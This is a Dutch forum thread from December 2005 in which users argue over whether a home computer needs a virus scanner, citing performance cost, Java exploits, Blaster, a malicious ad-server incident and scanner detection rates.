Met een gezond verstand browsen, software/OS up to date houden, weten wat je installed, wat je processen zijn etc. zal 99% van de kwade code uit je systeem houden.

Leuk idee, de praktijk wijst helaas anders uit zoals je al meerdere malen kunt lezen.

Virussen die flinke schade aanrichten worden meestal niet direct opgemerkt door de virusscanners, en dan ben je alsnog de l*l.

Wat bedoel je met "direct"? Het punt van de release of het punt dat het bestand je pc binnen komt?

Net zoveel werk dan als je geen scanner hebt en je komt er meestal pas achter als het toch al te laat is.

Gewoon onzin imho.

Vals gevoel van veiligheid die virusscanners

Zoals eerder aangegeven geeft geen enkel beveiligingsmechanisme 100% veiligheid. Dat een AV scanner de veiligheid verhoogt zul je niet kunnen ontkennen. Volledig op je AV scanner vertrouwens is gewoon dom (maar wel begrijpelijk in het geval van de doorsnede consument). Denken dat je zelf de zelfde mate van controle en preventie kunt uitvoeren als een complete goede scanner ook.

Het begrip virus en exploit wordt overigens nog weleens door elkaar heen gehaalt wat imo onterecht is.

Tegenwoordig zijn er virussen die de exploits misbruiken om zichzelf voort te planten.

[ Voor 10% gewijzigd door Bor op 11-12-2005 20:15 ]

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

zondag 11 december 2005 20:07

Acties:

0 Henk 'm!

pasta

Ondertitel

Topicstarter

Daos schreef op zondag 11 december 2005 @ 20:05:
Zou een virusscanner zoiets wel tegenhouden? Linkje en nog een linkje om te proberen.

Kaspersky AV geeft meteen aan dat het een Trojan.Java.Classloader.i is, dus ik zou zeggen dat het wel wordt tegengehouden.

edit:

2e linkje geeft meteen aan dat het een Exploit.Java.Bytverify is.

[ Voor 63% gewijzigd door pasta op 11-12-2005 20:10 ]

Signature

zondag 11 december 2005 20:23

Acties:

0 Henk 'm!

Verwijderd

Bor de Wollef schreef op zondag 11 december 2005 @ 20:06:

Wat bedoel je met "direct"? Het punt van de release of het punt dat het bestand je pc binnen komt?

Dat maakt niet zoveel uit, in eerste instantie bij release, maar daarna moet de gebruiker zijn AV software wel up to date hebben anders heb je er nog minder aan.

Leuk dat je het noemt. Die werd hier gewoon gestopt namelijk.

Ow geen idee dat er wel AV scanners waren die er wel wat tegen konden doen, maar goed ik hoop dat het idee duidelijk is

Gewoon onzin imho.

Ik bedoel dan ook de echte virussen en niet die allang bekend zijn die veelal daardoor te voorkomen zijn door oplettendheid van de gebruiker. Overigens zou het een discussiepunt kunnen zijn dat een gebruiker met AV software minder oplettend is dan eentje zonder (maar goed dat zal een welles/nietus spelletje worden zonder onderzoekresultaten

Zoals eerder aangegeven geeft geen enkel beveiligingsmechanisme 100% veiligheid. Dat een AV scanner de veiligheid verhoogt zul je niet kunnen ontkennen. Volledig op je AV scanner vertrouwens is gewoon dom (maar wel begrijpelijk in het geval van de doorsnede consument). Denken dat je zelf de zelfde mate van controle en preventie kunt uitvoeren als een complete goede scanner ook.

Of het de veiligheid verhoogt weet ik niet, ik zit er niet zo in maar ik kan me voorstellen dat er virussen/exploits speciaal gericht zijn op de AV software wat die veiligheid gelijk doet kelderen.

Tegenwoordig zijn er virussen die de exploits misbruiken om zichzelf voort te planten.

Zijn dat geen trojans?

zondag 11 december 2005 20:28

Acties:

0 Henk 'm!

Bob

Daos schreef op zondag 11 december 2005 @ 20:05:
[...]

Dat voorbeeldje is nu net een geval dat je niet met een beetje slim zijn tegenhoudt . Het maakt gebruik van een fout in de Java VM. Java kan standaard gebruikt worden door een website. Je hoeft dus alleen maar een bepaalde website te bezoeken en je krijgt dit automatisch.

Sinds ik levensgevaarlijk surf mijd ik dan ook alle ietwat verdachte sites. *knip* zal je bvb niet meer in mijn history aantreffen. Dus met wat voorzichtig/slim zijn is dat ook weer ok.

[ Voor 2% gewijzigd door pasta op 11-12-2005 20:31 ]

zondag 11 december 2005 20:30

Acties:

0 Henk 'm!

pasta

Ondertitel

Topicstarter

Zijn dat geen trojans?

In feite zijn het worms, gezien die als voornaamste eigenschap hebben zichzelf voort te planten. Je vindt tegenwoordig echter steeds meer all-in-one malware-oplossingen. Zie bijvoorbeeld deze post op de Kaspersky Weblog.

Bob_A schreef op zondag 11 december 2005 @ 20:28:
[...]

Sinds ik levensgevaarlijk surf mijd ik dan ook alle ietwat verdachte sites. *knip* zal je bvb niet meer in mijn history aantreffen. Dus met wat voorzichtig/slim zijn is dat ook weer ok.

Mja, ik denk dan aan bijv. dit bericht, waaruit blijkt dat zelfs normaliter betrouwbare sites malware verspreidden.

[ Voor 43% gewijzigd door pasta op 11-12-2005 20:34 ]

Signature

zondag 11 december 2005 20:36

Acties:

0 Henk 'm!

CycloneX

Born on probation

Wat zijn virussen die veel schade aanrichten

Zit net op de site van Trend te kijken de de 100 nieuwste virussen zijn allemaal low-risk, zo'n virus als Blaster tsjah wat doet het ja tis ff irritant dat rebooten maar richt het schade aan nee. Blaster legt alleen een lek in Windows open in dit geval RPC en is irritant. Veel virussen/trojans/malware zijn gebasseerd op fouten/bugs in software, zijn virussen die wel schade aanbrengen interessant voor de simpele thuisgebruiker

Zo'n Blaster of Sober virus is alleen irritant ze veroorzaken een overbelasting van wereldwijde netwerk doordat ze zich ontzettend snel verspreiden want dat was ook de bedoeling ervan.

Virussen zijn vaak waarschuwingen naar mensen die hun pc niet tot nauwelijks updaten en dat zijn er veel, zelfs Microsoft geeft illegale gebruikers de high risk updates. Grappige ervan is dat het vaak oude gaten zijn in Windows en toch worden veel mensen gepakt omdat ze nooit updaten. Voor de rest gewoon nieuwe lekken in Java Virtual Machine en in IE of zelfs Mozilla.

[ Voor 23% gewijzigd door CycloneX op 11-12-2005 20:43 ]

MacBook Pro “14” M4 Pro 24GB | iPhone 16 Pro | iPad Air 11-inch M2 | Denon AVC-X3800H | Q Acoustics 3050i

zondag 11 december 2005 20:44

Acties:

0 Henk 'm!

Daos

pasta schreef op zondag 11 december 2005 @ 20:07:
[...]

Kaspersky AV geeft meteen aan dat het een Trojan.Java.Classloader.i is, dus ik zou zeggen dat het wel wordt tegengehouden.

edit:
2e linkje geeft meteen aan dat het een Exploit.Java.Bytverify is.

Dat valt me mee.

Is de scanner er ook altijd op tijd bij als het gaat om een besmette jpg of een gat in Windows dat uitgebuit wordt?

zondag 11 december 2005 20:51

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Verwijderd schreef op zondag 11 december 2005 @ 20:23:

Dat maakt niet zoveel uit, in eerste instantie bij release, maar daarna moet de gebruiker zijn AV software wel up to date hebben anders heb je er nog minder aan.

Klopt, gelukkig gaat dat volledig automatisch tegenwoordig

Of het de veiligheid verhoogt weet ik niet, ik zit er niet zo in maar ik kan me voorstellen dat er virussen/exploits speciaal gericht zijn op de AV software wat die veiligheid gelijk doet kelderen.

Het aantal virussen dat de AV scanner kan disablen is enorm klein op dit moment. Daarbij gaat het dan ook nog om oude versies AV scanners die vulnerable zijn. Net als alle andere software moet je een AV scanner ook goed beheren en up2date houden.

Zijn dat geen trojans?

Nee, het gebruik maken van een exploit is totaal iets anders dan een trojan.

Daos schreef op zondag 11 december 2005 @ 20:44:
[...]

Dat valt me mee.

Is de scanner er ook altijd op tijd bij als het gaat om een besmette jpg of een gat in Windows dat uitgebuit wordt?

Er zit natuurlijk (helaas) altijd een klein tijdsgat tussen het uitkomen van een virus en de update voor de scanner. In de praktijk update bv KAV meerdere malen per dag, soms om het uur oid.

[ Voor 20% gewijzigd door Bor op 11-12-2005 20:53 ]

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

zondag 11 december 2005 22:22

Acties:

0 Henk 'm!

Ruzor

Off with his head man

pasta schreef op zondag 11 december 2005 @ 20:07:
[...]

Kaspersky AV geeft meteen aan dat het een Trojan.Java.Classloader.i is, dus ik zou zeggen dat het wel wordt tegengehouden.

edit:
2e linkje geeft meteen aan dat het een Exploit.Java.Bytverify is.

NOD 32 confirms

Ik vraag me af, waarom zou je geen virusscanner gebruiken?
- Neemt werk uit handen
- Weinig systeembelasting
- Kan gratis

Alleen maar om de moeite van het downloaden/installeren en je gedachte dat je het zelf wel kan regelen? Honderden gespecialiseerde werknemers werken elke dag aan de virusscanners om ze te verbeteren, optimaliseren om de nieuwste virussen tegen te houden, waarom denk je dat je dat zelf kan overtreffen? Je kunt ook niet alles alleen in de gaten houden, dat kun je toch beter aan een scanner overlaten? Daarnaast kan een scanner virussen opmerken die jij zelf niet zo kan zien. Wat als er een nieuwe soort virus ontdekt wordt waar je geen weet van hebt?

[ Voor 51% gewijzigd door Ruzor op 11-12-2005 22:37 ]

[This is what you get when you mess with us]

zondag 11 december 2005 23:37

Acties:

0 Henk 'm!

Verwijderd

Daos schreef op zondag 11 december 2005 @ 20:05:
[...]

Dat voorbeeldje is nu net een geval dat je niet met een beetje slim zijn tegenhoudt . Het maakt gebruik van een fout in de Java VM. Java kan standaard gebruikt worden door een website. Je hoeft dus alleen maar een bepaalde website te bezoeken en je krijgt dit automatisch.

Ik heb er ook last van gehad en heb toen dit topic geopend (0 replies ): Sun Java ook gevoelig voor hack?. Nu heb ik alles wat met Java en ActiveX te maken heeft uitstaan.

Zou een virusscanner zoiets wel tegenhouden? Linkje en nog een linkje om te proberen.

zucht. nog een voorbeeld van een prutsamateurvirus.

zondag 11 december 2005 23:55

Acties:

0 Henk 'm!

Verwijderd

pasta schreef op zondag 11 december 2005 @ 20:30:Mja, ik denk dan aan bijv. dit bericht, waaruit blijkt dat zelfs normaliter betrouwbare sites malware verspreidden.

en het beleid van tweakers (bepaling 16 algemene voorwaarden) verhindert dat je de nodige beveiligingsmaatregelen mag nemen. misschien zou een waarschuwing dat reclamebanners je aan mogelijke exploits blootstellen een gepaste aanvulling zijn van bep. 16. scant tweakers trouwens de advertentielinks, is wel interessant om te weten.

maandag 12 december 2005 03:35

Acties:

0 Henk 'm!

pasta

Ondertitel

Topicstarter

Verwijderd schreef op zondag 11 december 2005 @ 23:55:
[...]
en het beleid van tweakers (bepaling 16 algemene voorwaarden) verhindert dat je de nodige beveiligingsmaatregelen mag nemen. misschien zou een waarschuwing dat reclamebanners je aan mogelijke exploits blootstellen een gepaste aanvulling zijn van bep. 16. scant tweakers trouwens de advertentielinks, is wel interessant om te weten.

offtopic:
Tweakers.net scant zelf niet z'n eigen banners, alleen als er een banner tevoorschijn komt die tegen het Advertentiebeleid op Tweakers.net (Update 30-5-2005) beleid ingaat, mag (/kan je het beste) je een nieuw topic openen in Lieve Adjes of Frontpage Algemeen openen, om de situatie aan te kaarten. Meestal reageert het management-team er vrij snel op.

Verwijderd schreef op zondag 11 december 2005 @ 23:37:
[...]

zucht. nog een voorbeeld van een prutsamateurvirus.

Een prutsamateurvirus kan evengoed nog schade aanrichten aan het systeem. Daarbij lijkt dit nogal op een flame, dus kan je in het vervolg dit soort dingen of niet melden, of in een topic report melden.

Signature

maandag 12 december 2005 03:44

Acties:

0 Henk 'm!

Verwijderd

CycloneX schreef op zondag 11 december 2005 @ 20:36:
Wat zijn virussen die veel schade aanrichten

Zit net op de site van Trend te kijken de de 100 nieuwste virussen zijn allemaal low-risk, zo'n virus als Blaster tsjah wat doet het ja tis ff irritant dat rebooten maar richt het schade aan nee. Blaster legt alleen een lek in Windows open in dit geval RPC en is irritant. Veel virussen/trojans/malware zijn gebasseerd op fouten/bugs in software, zijn virussen die wel schade aanbrengen interessant voor de simpele thuisgebruiker Zo'n Blaster of Sober virus is alleen irritant ze veroorzaken een overbelasting van wereldwijde netwerk doordat ze zich ontzettend snel verspreiden want dat was ook de bedoeling ervan.

Maar het betrof ook webservers en dergelijk draaiende op w2k / w2k3, dus dan kan je je wel voorstellen hoe erg de schade was

maandag 12 december 2005 10:03

Acties:

0 Henk 'm!

CycloneX

Born on probation

Jah precies Webservers/bedrijfsnetwerken helemaal mee eens, ik zie thuisgebruikers en bedrijfsvoering los van elkaar.

Voor bedrijven/webparken/servers ben ik ook voorstander van optimale beveiliging qua virus/firewall/spam maarja dan hebben we het meer over hardwarematige oplossingen

MacBook Pro “14” M4 Pro 24GB | iPhone 16 Pro | iPad Air 11-inch M2 | Denon AVC-X3800H | Q Acoustics 3050i

maandag 12 december 2005 10:10

Acties:

0 Henk 'm!

Verwijderd

Ik gebruik geen virusscanner omdat deze teveel ram gebruiken, ik zit op 512 mb ram en dat is al een beetje krap om games mee te spelen, dus als ik een av in achtergrond draai vind ie t helemaal niet fijn meer, heb bijna nooit last van virussen, enkele keer een adware ofso (ik doe af en toe een online scan bij trendmicro om de ergste dingen te clearen)

maandag 12 december 2005 10:20

Acties:

0 Henk 'm!

Dennis

Vroeger gebruikte ik ook nooit een virusscanner, maar tegenwoordig wel, omdat het toch wel nodig is. In de twee jaar dat ik het nu gebruik heb ik denk ik één of twee keer bijna een infectie opgelopen.

maandag 12 december 2005 10:24

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

CycloneX schreef op maandag 12 december 2005 @ 10:03:
Jah precies Webservers/bedrijfsnetwerken helemaal mee eens, ik zie thuisgebruikers en bedrijfsvoering los van elkaar.

Voor bedrijven/webparken/servers ben ik ook voorstander van optimale beveiliging qua virus/firewall/spam maarja dan hebben we het meer over hardwarematige oplossingen

Ten eerste, wat is er beter aan een hardware matige oplossing? Dat zijn namelijk ook gewoon doosjes die in de meeste gevallen een vorm van BSD of ander OS.

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

maandag 12 december 2005 10:48

Acties:

0 Henk 'm!

CycloneX

Born on probation

Goeie hardware firewall die worden beheert via de leverancier met een SLA dus updates en support.

- hardwarematig is vaak efficienter
- performance ligt vaak hoger (interessanter voor bedrijfsnetwerken)
- je belast de server er niet mee

Ja Bor er blijft software nodig al zit het in een rom

[ Voor 7% gewijzigd door CycloneX op 12-12-2005 10:50 ]

MacBook Pro “14” M4 Pro 24GB | iPhone 16 Pro | iPad Air 11-inch M2 | Denon AVC-X3800H | Q Acoustics 3050i

maandag 12 december 2005 11:03

Acties:

0 Henk 'm!

Qwerty-273

Meukposter

***** ***

Heb al sinds jaar en dag een virusscanner draaien, ben alleen nooit aangesproken door virussen zoals I love you, bagle, mydoom en alle anderen. Geen infectie gehad en nooit problemen. Maar waarom dan toch een virusscanner? Gewoon omdat mensen ook een firewall draaien, het geeft een extra barriere tegen een infectie. Performance verlies met het draaien van een virusscanner tijdens het spelen van games of afspelen van films heb ik niet. Heb geen up to date systeem, maar alles loopt soepel genoeg zoals het altijd heeft gedaan.

Voor de kosten hoef je het niet te laten, er zijn een aantal gratis beschikbare virusscanners voor thuisgebruik beschikbaar. Al gebruik ik McAfee via een licentie op het werk.

Erzsébet Bathory | Strajk Kobiet | You can lose hope in leaders, but never lose hope in the future.

maandag 12 december 2005 11:17

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

CycloneX schreef op maandag 12 december 2005 @ 10:48:
Goeie hardware firewall die worden beheert via de leverancier met een SLA dus updates en support.

- hardwarematig is vaak efficienter
- performance ligt vaak hoger (interessanter voor bedrijfsnetwerken)
- je belast de server er niet mee

Ja Bor er blijft software nodig al zit het in een rom

Vaak zit het niet eens in een ROM maar staat het gewoon op een HD

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

maandag 12 december 2005 14:39

Acties:

0 Henk 'm!

Jimbolino

troep.com

Grappig om met voorbeelden als JAVA_BYTEVER.A aan te komen zetten.
Ik gebruik namelijk wel eens een online virusscanner en die vinden altijd van dit soort "virussen". Beetje raar om dat te zeggen, aangezien ik geen java op mijn pc heb

Via de advertentieserver van Ilse Media is afgelopen zaterdag naar schatting vier uur lang een trojan horse verspreid. Gebruikers van Internet Explorer zonder de laatste updates of SP2 die tussen vrijdag 22:00 en zaterdag 14:00 één van de hierdoor getroffen sites (waaronder zich grote namen als Nu.nl, Startpagina.nl en Ilse.nl bevinden) hebben bezocht, lopen het risico om besmet te zijn met een exploit

Erg leuk nieuws, zegt eerder iets over de beveiliging van websites dan over het risico om besmet te worden met een virus.
Het gaat hier echter weer om UNPATCHED systemen.

Ik heb nog nooit een uitbraak van een virus meegemaakt waar geen (automatisch verkrijgbare) patch voor beschikbaar was. Dat mensen niet patchen lig ik niet wakkker van, maar dan moeten ze niet zeuren over virusinfecties.

Je riep een paar posts terug iets over internetbankieren op een niet beveiligde pc? Leuk dat je dat soort dingen roept, maar de gevallen die bekend zijn met fraude via internetbankieren, zijn allemaal phising gevallen, en dus 100% niks te maken met virusscanners en firewalls...

The two basic principles of Windows system administration:
For minor problems, reboot
For major problems, reinstall

maandag 12 december 2005 14:50

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Jimbolino schreef op maandag 12 december 2005 @ 14:39:

Erg leuk nieuws, zegt eerder iets over de beveiliging van websites dan over het risico om besmet te worden met een virus.
Het gaat hier echter weer om UNPATCHED systemen.

.

Klopt maar elk systeem is unpatched als er nog geen patch uit is wat ook regelmatig gebeurt. Daarnaast zegt het natuurlijk absoluut iets over de kans op besmetting, namelijk dat je zelfs door het displayen van ads van gerenormeerde sites het bokje kunt zijn en het "ik weet wel wat ik aanklik etc" verhaal dus lang niet altijd opgaat.

Je riep een paar posts terug iets over internetbankieren op een niet beveiligde pc? Leuk dat je dat soort dingen roept, maar de gevallen die bekend zijn met fraude via internetbankieren, zijn allemaal phising gevallen, en dus 100% niks te maken met virusscanners en firewalls...

Dat heeft zeker wel iets te maken met AV scanners etc.De bank staat namelijk niet automatisch garant voor de veiligheid van jouw geld bij het gebruik van Internetbankieren. Gebeurt er iets dan zal jij ook moeten kunnen aantonen dat je alle "normale" zaken hebt gedaan om de veiligheid van de informatie te waarborgen. Hier horen algemeen geaccepteerde beveiligingsmaatregelen als een firewall en virusscanner imho ook bij. Ik neem aan dat een rechter precies hetzelfde zal oordelen.

Grappig om met voorbeelden als JAVA_BYTEVER.A aan te komen zetten.
Ik gebruik namelijk wel eens een online virusscanner en die vinden altijd van dit soort "virussen". Beetje raar om dat te zeggen, aangezien ik geen java op mijn pc heb

Ook al heb je het pakket waarvoor het virus is geschreven: je hebt nog steeds het virus met de schadelijke payload op je systeem staan.

[ Voor 26% gewijzigd door Bor op 12-12-2005 14:56 ]

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

maandag 12 december 2005 14:57

Acties:

0 Henk 'm!

F_J_K

Moderator CSA/PB

Front verplichte underscores

Verwijderd schreef op zondag 11 december 2005 @ 23:55:
en het beleid van tweakers (bepaling 16 algemene voorwaarden) verhindert dat je de nodige beveiligingsmaatregelen mag nemen. misschien zou een waarschuwing dat reclamebanners je aan mogelijke exploits blootstellen een gepaste aanvulling zijn van bep. 16. scant tweakers trouwens de advertentielinks, is wel interessant om te weten.

Zoiets gebeurt niet alleen via ads (al is dat wel een snelle manier om te verspreiden), dus wil je alle images uitschakelen in je browser (dus incl. de ads en alle plaatjes die users posten).

offtopic:
T.net zal het in dat geval in mijn nederige opinie niet erg vinden (net als wanneer je bijv. Lynx gebruikt). Als dat wel een probleem is koop ik persoonlijk een abo voor je

Los daarvan, de nodige maatregelen zijn patches, instellingen van browser en (deze hele discussie even negerend

) een goede en uptodate virusscanner. Ik zie niets staan dat dat tegenspreekt

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)

maandag 12 december 2005 15:19

Acties:

0 Henk 'm!

]Byte[

@ Bor
lol....
Dan is dit er nog eentje die "verstand van zaken" heeft (of zou moeten hebben) die wel heel hard tegen die muur is gelopen.
Wat nog zorgwekkender is dat ie er dus niets van heeft geleerd!

Laat hem eens uitrekenen hoeveel tijd (dus €€€) dit heeft gekost, en wat een antivirus pakketje kost.
En dan nog alle ergenissen die hij er aan heeft overgehouden....

(Dat heeft ie binnen 1 uur terug kunnen verdienen)
100% beveiliging is een utopie!
Dan moet je alle externe media (netwerk, floppy, cardreaders, usb-sticks etc.) verbannen, of "de veiligste PC is er een die uit staat" hanteren.
Maar helemaal geen enkele vorm van beveiliging gebruiken omdat "hijzelf de beste beveiliging is" is wel echt het stomste van de bovenste plank wat je kan doen.
Maarja, ook ik kom helaas nog steeds teveel mensen tegen die op die manier met hun neus op de feiten zijn gedrukt.
Ze kunnen wel voor € 1000,- een PC kopen, maar voor een bedrag van minder dan € 35,- voor een antiviruspakketje beginnen ze niet aan.
Voor een particulier is mijn idee:

Voor een zakelijk gebruiker:

Voor een zakelijk gebruiker met verstand van zaken:

maandag 12 december 2005 16:04

Acties:

0 Henk 'm!

swampy

Coconut + Swallow = ?

oudakker schreef op maandag 12 december 2005 @ 15:19:
@ Bor
lol....
Dan is dit er nog eentje die "verstand van zaken" heeft (of zou moeten hebben) die wel heel hard tegen die muur is gelopen.
Wat nog zorgwekkender is dat ie er dus niets van heeft geleerd!
...
Voor een particulier is mijn idee:
Voor een zakelijk gebruiker:
Voor een zakelijk gebruiker met verstand van zaken:

Nu moet ik zeggen dat als je als werknemer ICT nogwat afdeling met Mcafee moet werken ( 4 ofzo ) en met 6 jaar oude DAT files...dan is het niet gek dat je weinig vertrouwen hebt in AV's

Maar een up to date versie van een antirivus plus signature updates, houdt veel meer tegen dan je denkt. Virussen in verschillende soorten formaten, verbeterde mogelijkheden to scannen in archief files, heuristic scan, bijhouden van CRC's dus niet iets voor de 2de keer hoeven scannen zolang het niet verandert is.

Een moderne AV, en met dat bedoel ik dus niet Norton AV of Mcafee, hoeft totaal het systeem niet zwaar te belasten / in de weg de zitten.

Panda Antivirus, KAV en nog een zooi anderen zijn veel beter dan Norton of Mcafee. Norton heeft vaak maar een herkennings rate van ... 70% ofzo. En Mcafee doet het niet veel beter.
Panda Antivurs, KAV en NOD32 en vrienden zitten vaak boven de 98%

There is no place like ::1

maandag 12 december 2005 16:14

Acties:

0 Henk 'm!

pingkiller

Ik gebruik geen virusscanner. Door mijn surf en download gedrag+een linux router/firewall acht ik mijzelf redelijk veilig. Ik heb ook vrijwel nooit last gehad van een virus. Of jawel,een aantal jaar geleden had ik een virus. Die werd ook braaf herkend door de legale norton die ik toen had,maar norton kon er niks aan doen,dus moest ik de boel alsnog formateren.
Sindsdien gebruik ik geen virusscanner meer.
Performance verlies+aanschaf kosten(heb gratis virusscanners geporbeerd maar dan vond ik niks) wegen niet op tegen de voordelen.
En mocht het een keer toch fout gaan,dan gewoon weer een format,no problemo.

CSS snippet om users te blokkeren: https://tweakers.net/instellingen/customcss/snippets/bekijk/2618/

maandag 12 december 2005 16:43

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

pingkiller schreef op maandag 12 december 2005 @ 16:14:
Ik gebruik geen virusscanner. Door mijn surf en download gedrag+een linux router/firewall acht ik mijzelf redelijk veilig. Ik heb ook vrijwel nooit last gehad van een virus. Of jawel,een aantal jaar geleden had ik een virus. Die werd ook braaf herkend door de legale norton die ik toen had,maar norton kon er niks aan doen,dus moest ik de boel alsnog formateren.
Sindsdien gebruik ik geen virusscanner meer.
Performance verlies+aanschaf kosten(heb gratis virusscanners geporbeerd maar dan vond ik niks) wegen niet op tegen de voordelen.
En mocht het een keer toch fout gaan,dan gewoon weer een format,no problemo.

En wederom dezelfde argumenten waarvan het tegendeel al meerdere malen in dit topic staat. Het performance verlies is niet tot nauwlijks een argument meer. Aanschafkosten ook niet meer gezien bv AVG toch een aardige scanner is die bovendien helemaal niets kost. Met een format alleen ben je er natuurlijk niet. Mogelijk is je backup (als je die al hebt) ook infected en heb je tijden staan te spammen / andere machines staan infecteren.

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

maandag 12 december 2005 16:59

Acties:

0 Henk 'm!

]Byte[

Bor de Wollef schreef op maandag 12 december 2005 @ 16:43:
[...] en heb je tijden staan te spammen / andere machines staan infecteren.

Lol...
Een collega van mij is pas nog door zijn provider afgesloten omdat er via zijn verbinding massa's spam de deur uit gingen.
Hij vondt wel dat de laatste dagen zijn verbinding traag was...

(goh, hoe zou dat komen?

)

maandag 12 december 2005 17:04

Acties:

0 Henk 'm!

Daos

Jimbolino schreef op maandag 12 december 2005 @ 14:39:
Grappig om met voorbeelden als JAVA_BYTEVER.A aan te komen zetten.
Ik gebruik namelijk wel eens een online virusscanner en die vinden altijd van dit soort "virussen". Beetje raar om dat te zeggen, aangezien ik geen java op mijn pc heb

Elke Windows-PC heeft java. Zoek maar eens naar jview.exe en java.exe. Deze bestanden horen respectievelijk bij de Microsoft VM en Sun VM.

Omdat je niet wist dat je java hebt is er een grote kans dat je er nooit updates voor hebt geinstalleerd en dus gevoelig bent voor oude exploits.

Bor de Wollef schreef op maandag 12 december 2005 @ 16:43:
[...]
En wederom dezelfde argumenten waarvan het tegendeel al meerdere malen in dit topic staat. Het performance verlies is niet tot nauwlijks een argument meer.

Je verliest nog wel veel performance. Het opstarten gaat een stuk trager en bovendien kan je niet meer een beetje rondneuzen in de verkenner zonder dat je bij elke map een paar seconden moet wachten.
Waarschijnlijk draait er bij jou al zoveel troep op de achtergrond dat je het verschil niet merkt.

maandag 12 december 2005 17:17

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Daos schreef op maandag 12 december 2005 @ 17:04:
[...]

Je verliest nog wel veel performance. Het opstarten gaat een stuk trager en bovendien kan je niet meer een beetje rondneuzen in de verkenner zonder dat je bij elke map een paar seconden moet wachten.
Waarschijnlijk draait er bij jou al zoveel troep op de achtergrond dat je het verschil niet merkt.

Sorry maar mijn ervaring is totaal anders. Geen merkbare vertragingen in Windows Explorer, slechts minimaal langere opstarttijd (scheelt nog geen 10 seconden als ik alle opties van KAV aan heb staan).

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

maandag 12 december 2005 18:07

Acties:

0 Henk 'm!

pingkiller

Bor de Wollef schreef op maandag 12 december 2005 @ 16:43:
[...]

En wederom dezelfde argumenten waarvan het tegendeel al meerdere malen in dit topic staat. Het performance verlies is niet tot nauwlijks een argument meer. Aanschafkosten ook niet meer gezien bv AVG toch een aardige scanner is die bovendien helemaal niets kost. Met een format alleen ben je er natuurlijk niet. Mogelijk is je backup (als je die al hebt) ook infected en heb je tijden staan te spammen / andere machines staan infecteren.

Ik heb dus maar 1 keer een serieuze virus infectie gehad,en die kon mijn viruscanner niet verwijderen.
Waarom zou ik iets draaien wat me beschermd tegen iets waar ik geen last van heb? Ik ben dus nooit besmet geraakt(op die ene keer na en ik check heeeel af en toe met een online virusscan).Ik zie obsoluut geen reden op wel een virusscanner te draaien.
En ik vind de vertraging dus wel merkbaar.

CSS snippet om users te blokkeren: https://tweakers.net/instellingen/customcss/snippets/bekijk/2618/

maandag 12 december 2005 18:24

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

pingkiller schreef op maandag 12 december 2005 @ 18:07:
[...]

Ik heb dus maar 1 keer een serieuze virus infectie gehad,en die kon mijn viruscanner niet verwijderen.
Waarom zou ik iets draaien wat me beschermd tegen iets waar ik geen last van heb? Ik ben dus nooit besmet geraakt(ik check heeeel af en toe met een online virusscan).Ik zie obsoluut geen reden op wel een virusscanner te draaien.
En ik vind de vertraging dus wel merkbaar.

Je spreekt jezelf enorm tegen. Ik heb een keer een serieuze infectie gehad en ik ben dus nooit besmet geraakt. Daarnaast, zoals nou al heel vaak aangegeven geeft het niet besmet geraakt zijn in het verleden (wat jij dus blijkbaar wel bent) geen garantie.

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

maandag 12 december 2005 18:28

Acties:

0 Henk 'm!

Verwijderd

Kom op het gaat er toch niet om om elkaar letterlijk bij de woorden klem te praten? Doe je maar in een rechtszaal ofzo

maandag 12 december 2005 18:43

Acties:

0 Henk 'm!

CycloneX

Born on probation

Sommige willen kosten wat het kosten hun gelijk halen

[ Voor 43% gewijzigd door CycloneX op 12-12-2005 18:44 ]

MacBook Pro “14” M4 Pro 24GB | iPhone 16 Pro | iPad Air 11-inch M2 | Denon AVC-X3800H | Q Acoustics 3050i

maandag 12 december 2005 18:50

Acties:

0 Henk 'm!

Rhannie

[DPC] Team Black Bulls

Ik gebruik geen virusscanner, omdat ik simpelweg gewoon nergens last van heb. Ik check een aantal keer per jaar mijn PC met de online versie van Panda Antivirus en Hitman Pro en die vinden nooit iets. Ik zit achter een hardwarematige firewall (Linksys WRT54G) en ik gebruik Firefox in plaats van Internet Explorer.

Edit:
Ik heb zojuist mijn 6 maanden oude Windows XP professional installatie voor het eerst gescand en hij vond alleen een paar cookies en hij zag de uninstaller van een Battlefield 2 mod aan voor spyware.

[ Voor 26% gewijzigd door Rhannie op 12-12-2005 19:33 ]

maandag 12 december 2005 19:46

Acties:

0 Henk 'm!

Ruzor

Off with his head man

Paddixx schreef op maandag 12 december 2005 @ 18:50:
Ik gebruik geen virusscanner, omdat ik simpelweg gewoon nergens last van heb. Ik check een aantal keer per jaar mijn PC met de online versie van Panda Antivirus en Hitman Pro en die vinden nooit iets. Ik zit achter een hardwarematige firewall (Linksys WRT54G) en ik gebruik Firefox in plaats van Internet Explorer.

Edit:
Ik heb zojuist mijn 6 maanden oude Windows XP professional installatie voor het eerst gescand en hij vond alleen een paar cookies en hij zag de uninstaller van een Battlefield 2 mod aan voor spyware.

Maar als er wel wat gevonden wordt ben je wel de klos. Dan kan het virus al een half jaar op je PC staan en schade hebben aangericht. Beetje raar dat je zegt dat je geen virusscanner gebruikt omdat je nergens last van hebt. "Ik heb sex zonder condoom omdat ik nergens last van heb". Nofi, voor hetzelfde geld heb je een soa of erger

Niet dat een condoom alles tegenhoudt, net zoals een virusscanner niet, maar zeker wel voor een groot deel. Zie ook Bor de Wollef in "Wel of niet een virusscanner gebruiken?"

And again:

Ruzor schreef op zondag 11 december 2005 @ 22:22:
